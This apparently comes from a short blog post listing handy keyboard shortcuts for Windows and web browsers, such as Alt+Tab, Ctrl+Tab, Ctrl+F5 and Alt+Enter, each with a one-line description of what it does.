Ctrl+Home and Ctrl+End: Useful for quickly going to the top and bottom of a page.

Ctrl+P: Useful for printing the current page.

Space Bar: While viewing a web page in a browser, pressing space bar moves the page down.

Alt+Tab: Useful for quickly cycling between running applications. Press along with Shift to cycle backwards.

Ctrl+Tab: Cycle between tabs in your browser.

Ctrl+F5: Clears the cache and refreshes the current tab.

Shift+Right click: Open alternate right click options.

Alt+Double click: Open the file's properties. Alt+Enter can also be used for this.

These are some keyboard shortcuts that I found extremely useful. If you know some more useful keyboard shortcuts, do mention them in the comments.